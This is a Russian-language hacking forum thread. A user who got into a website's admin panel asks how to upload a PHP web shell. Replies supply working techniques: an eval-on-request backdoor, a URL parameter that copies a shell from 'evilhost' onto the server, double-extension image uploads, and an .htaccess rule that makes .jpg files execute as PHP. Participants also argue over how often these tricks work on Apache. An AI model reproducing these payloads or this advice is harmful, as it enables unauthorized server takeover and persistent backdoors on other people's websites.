Заливка шелла через правку html

Вчера попал в админку.
А в ней можно только новости в html редактировать, ток вот я попробывал вставить:

Загрузка файлов

PHP:

<!DOCTYPE html>
<html>
 <head>
  <meta charset="utf-8">
  <title>Отправка файла на сервер</title>
 </head>
 <body>
  <form enctype="multipart/form-data" method="post">
   <p><input type="file" name="f">
   <input type="submit" value="Отправить"></p>
  </form> 
 </body>
</html>

форма отображается на странице
но файлы я так понял всё равно не загружаются... думаю прав нет.

Есть ещё варианты для загрузки шелла через html ?

 

вариантов вообше нет

 

жжЁте

по вашему файл сам себя будет копировать на жесткий диск? вы же не обрабатываете файл на стороне сервера

 

Дык для того, чтобы принять этот файл, на той странице, куда он отправляется (текущей) должен быть и обработчик, не так ли ? Так вы стучите пальцем об стену.

 

Видимо именно так.

Неужели действительно нет вариантов??

 

нет.

 

Варианты может и есть просто не через правку новостей
Может в админе есть заливка картинок или других файлов ?

 

заливка картинок есть, но я к примеру заливаю даже картинку image.gif, а на сервере она сохраняется как 29120000.jpg

это можно обойти?

 

Увы. Lfi там случаем нигде нет с возможностью обрезки расширений ? так бы у вас был единственный шанс выполнить там шелл.

 

думаю нет.
так как все странички сайта на html, но у меня когда-то доступ к нему был и знаю что оболочка вся на php, ничего кроме xss там не нашлось

 

Уважаемый ТС, хочу обратить Ваше внимание на одну мелочь - Варианты есть всегда (с)

Что за движок?

можно попробовать вставить php код с бекдором:

PHP:

@php
eval($_REQUEST[e]);
php@  

Смотрим абсолютный путь:

HTML:

localhost/?e=phpinfo();

Льем шелл:

HTML:

yoursite.com/news/1.html?e=copy("evilhost/shell.txt","/home/yoursite/shell.php");

Это в свое время сработало на PHPShop CMS, кстати не так давно....
Это как вариант номер раз)

Вариант номер 2.1:
Можно попробовать залить вместо картинки файл shell.php.jpg , допустим обработчик переименует его в 12312312312.php.jpg - это может прокатить, при определенных конфигах сервера....

Вариант 2.2:
Также можно попробовать залить shell.jpg

Предварительно залив .htaccess следующего содержания:

HTML:

AddType application/x-httpd-php .jpg

Тогда сервер будет обрабатывать .jpg файлы как приложение php и переименованный шелл с новым названием 123123123123.jpg отработает как пых файл)

Вариант 2.3:
Попробуй залить файл shell.php.g1f или shell.php.ololo

файл shell.php.ololo имеет неизвестный формат, т.к. апачу не знакомо расширение .ololo он начнет обрабатывать наш шелл как PHP файл.


PS а вообще, я уверен, что это далеко не все способы которые можно попробовать заливаясь из админки...

 

умники собрались

Тake_IT

"@php
eval($_REQUEST[e]);
php@ "

ты где встречал такие теги "@php php@" ?
если в каком то темплейт двиге оно используется как пхп тег это не значит что оно везде будет работать.

тс сказал что залить можно картинки, с чего ты взял что можно загрузить хтакцесс?

"12312312312.php.jpg - это может прокатить, при определенных конфигах сервера...."
ага, определенные конфиги, какой даун админ будет настроить сервер на обработку jpeg как php

такие методы могут сработать в конкретных двигах, но в общем случай писать о них как о методах заливки шелла это глупо.

 

[offtop]Раньше ты попроще был)) [/offtop]

эти теги я встречал минимум в 3 движках phpshop cms , Instant Update CMS, Blox CMS, могу еще вспомнить....

учитывая то, что ТС совсем зеленый, я предположил что он может не совсем правильно описывать ситуацию, в частности, с загрузкой файлов. поэтому решил напомнить про несколько несложных методов)

случаев когда файлы .php.gif запускаются - масса, на моей памяти это примерно 15-20%

в конкретных двигах говорите?) а мы знаем с каким двигом столкнулся ТС ? а вдруг это тот самый, "конкретный"??

PS мне кажется от твоего совета было бы больше проку, чем от критики)

 

я выше уже отписался, что если нету конкретной инфы о двиге, то не имеет смысла описать какие то левые методы которые работают с очень низкой частотой

 

ну извините бл* )) если случаев, когда .php.gif обрабатывается как пхп 15-20% (1 из 5\6 - оказывается для тебя этого мало) , то этими способами похекалось минимум половина всех CMS которые я изучал)) а ты говоришь про низкую частоту...


PS ага, пароль потерял, давно не заходил сюда)

 

опачки! одепты подтянулись)))

Ох, ну ничего себе кто меня учить собрался))))

да я и не утверждаю что нормальный человек так настроит сервер суть не в том из за чего это работает(админ дурак или серв похекали раньше), суть в том, что это работает(фактически) и с достаточно большой вероятностью, пусть это будет даже 1 сервер из 10...
А про то, как в нормальных CMS появляются бекдоры, я расскажу немного позже) как раз снял видео на эту тему

с натяжкой?) а объясни почему это сработает не всегда и почему вообще работает?)
file.php.ololo имеет неизвестное для апача расширение .ololo поэтому он будет обрабатывать file.php.ololo точно также как и file.php. а знаешь почему?? потому, что в случае если апач встречает файл с незнакомым расширением он начинает искать знакомое расширение с конца имени файла, т.е. фактически, если бы мы залили file.php.txt.ololo он бы выполнился как .txt. А не сработает это в том случае, если в дире куда льем файл не выполняется пых
Зы вам че, квестики перестали делать?)) плохо, мозги как и мышцы надо тренировать))) И кстати, если для тебя вышеописанное фантастика, почитай хоть темы роа за 2009-2011 года, помнится там было много примеров)

троллинг не засчитан, тренируйтесь лучше на кошках (с)

 

пардон, я не говорю что от этого нет никакой защиты и это работает в 100%, но ведь на локалке, в искусственных условиях, можно добиться самого разного результата и сделать что угодно)

 

Какие там требования чтоб file.php.unknown_extension выполнялся как .php напомните пожалуйста.

mod_mime enabled кажется, и что-то ещё видимо. У меня на локалке mod_mime вроде стоит, а код не выполняется.